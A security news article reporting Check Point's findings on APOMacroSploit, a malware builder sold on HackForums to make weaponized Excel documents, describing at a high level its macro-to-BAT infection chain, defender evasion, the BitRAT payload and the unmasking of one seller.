Researchers uncovered a new Malware Builder dubbed APOMacroSploit

Researchers spotted a new Office malware builder, tracked as APOMacroSploit, that was employed in a campaign targeting more than 80 customers worldwide.

Researchers from security firm Check Point uncovered a new Office malware builder called APOMacroSploit, which was employed in attacks that targeted more than 80 customers worldwide.

APOMacroSploit is a macro builder that was to create weaponized Excel documents used in multiple phishing attacks. The threat actor behind the tool continuously updated it to evade detection. Check Point researchers were able to unmask one of the threat actors behind the builder. 

Excel documents created with the APOMacroSploit builder are capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection.

“The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script.” reads the analysis published by the researchers.

“Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product.”

Experts believe APOMacroSploit was created by two French-based threat actors “Apocaliptique” and “Nitrix” who were selling the product on HackForums.net.

About 40 hackers took part in the campaign that the researchers in November uncovered, they used 100 different email senders targeting users in more than 30 different countries.

“The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt.ly.” continues the analysis. “The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion.”

The researchers noticed that the attackers made a mistake, The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end. The servers host the BAT files, for each file, the nickname of the customer was inserted inside of the filename.

The BAT script downloads the fola.exe malware for one of the following Windows versions;

• Windows 10
• Windows 8.1
• Windows 8
• Windows 7

In order to avoid detection, the BAT scripts add the malware location in the exclusion path of Windows Defender and disabling Windows cleanup before executing the malware.

In at least one attack, the threat actors used a Delphi Crypter along with a second-stage malware, a remote access Trojan dubbed BitRAT.

BitRAT implements multiple features, including mining cryptocurrencies and RAT features. A Notepad.exe injected shellcode drops a VBS file in the startup folder to ensure persistency.

The researchers were able to unmask the real identity of Nitrix, because he revealed his actual name in a post on Twitter containing a picture of a ticket he bought for a concert in December 2014.

Check Point Research shared their findings with law enforcement and provided in the report Indicators of Compromise (IoCs) for this campaign.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, apomacrosploit)

[adrotate banner=”5″]

[adrotate banner=”13″]